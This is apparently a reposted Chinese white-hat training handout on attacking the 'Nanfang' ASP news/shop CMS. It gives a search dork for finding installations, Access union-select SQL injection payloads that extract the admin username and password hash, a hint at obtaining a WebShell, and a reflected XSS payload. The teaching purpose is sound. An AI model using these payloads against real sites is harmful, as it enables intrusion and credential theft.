米斯特白帽培训讲义 实战篇 南方 0day
2016-12-26 14:38
253 查看
米斯特白帽培训讲义 实战篇 南方 0day
讲师:gh0stkey整理:飞龙
协议:CC BY-NC-SA 4.0
搜索
关键词:inurl:"HomeMarket.asp"。
下载与部署
http://www.jb51.net/article/5336.htmSQL 注入
我们打算检测其中的 SQL 注入漏洞,由于 ASP 代码基本没有什么好的过滤,一般一查一个准。为了搜索 SQL 注入漏洞,我们可以使用sql、
conn这类名称、或者
execute这类函数来定位到数据库查询低吗位置。
比如在
NewsType.asp的 14 ~ 32 行,我们发现了:
<% ' ... BigClass=request("BigClass") SmallClass=request("SmallClass") ' ... %> <% if BigClass<>"" and SmallClass<>"" then sql="select * from News where BigClassName='"& BigClass &"' and SmallClassName='"& SmallClass &"' order by AddDate desc" set rs=conn.execute(sql) do while not rs.eof %>
我们看到这是文本型的参数,也就是说我们注入的时候要想办法闭合单引号。而且它用的是 Access 数据库,我们没办法像 MySQL 和 SQLServer 那样使用
--来注释。
我们照旧为
SmallClass输入
' and '1'='1,构造的 URL 为
NewsType.asp?SmallClass=%27%20and%20%271%27=%271,发现正常。
输入
' and '1'='2,构造的 URL 为
NewsType.asp?SmallClass=%27%20and%20%271%27=%272,发现错误。
接下来我们查看源码目录下的
Databases/0791idc.mdb,知道了
News表一共有十个字段。
之后输入
' and 1=2 union select 1,2,3,4,5,6,7,8,9,0 from admin where '1'='1,发现显示 2 和 9:
之后就很简单了,我们先看看
admin表里面的用户名和密码都叫做啥。我们把 2 替换为
username,9 替换为
password。
然后把
f3a976c77dc7264c送到 pmd5 解密,结果为
060618。
之后可以从
/admin访问后台,登录并继续拿 WebShell。
XSS
我们点击网站右上角的“联系我们”,可以发现这个页面的 URL 中出现了这四个字,页面中也出现了这四个字。然后我们把 URL 中的
Title参数改成
1:
这就提示我们这里面可能会出现 XSS,我们改成
<script>alert(1)</script>:
我们看到源代码中出现了这个东西。
相关文章推荐
- 米斯特白帽培训讲义 漏洞篇 XSS
- 米斯特白帽培训讲义(v2)漏洞篇 Web 中间件
- 【讲义提纲】以一个实战新闻cms增删改查demo为例,给学院国创队伍培训php
- 米斯特白帽培训讲义 漏洞篇 越权
- 米斯特白帽培训讲义(v2)实战篇 迅雷 CMS
- 米斯特白帽培训讲义(v2)实战篇 余闻同学录
- 米斯特白帽培训讲义(v2)实战篇 捷达系统
- 米斯特白帽培训讲义 实战篇 WordPress
- Windows RT 应用程序开发介绍培训的讲义
- Sencha Touch 实战开发培训 电子书 基础篇
- 蓝鲸财经新闻记者实战培训
- Android培训实战教程之 Studio下JNI开发
- CVS培训讲义
- 20170117老男孩linux实战运维培训-SSH KEY免密码验证分发、管理、备份实战讲解01
- Scrum 敏捷开发过程实战培训
- Sencha Touch 实战开发培训 视频教程 第二期 第五节
- Oracle Goldengate数据库复制与容灾项目实施与维护_OGG实战培训
- 【备忘】传智播客最新大数据第3期实战培训完整版视频教程
- 云计算基础知识培训讲义
- [kernel新手培训实战系列1 ] watchdog driver编写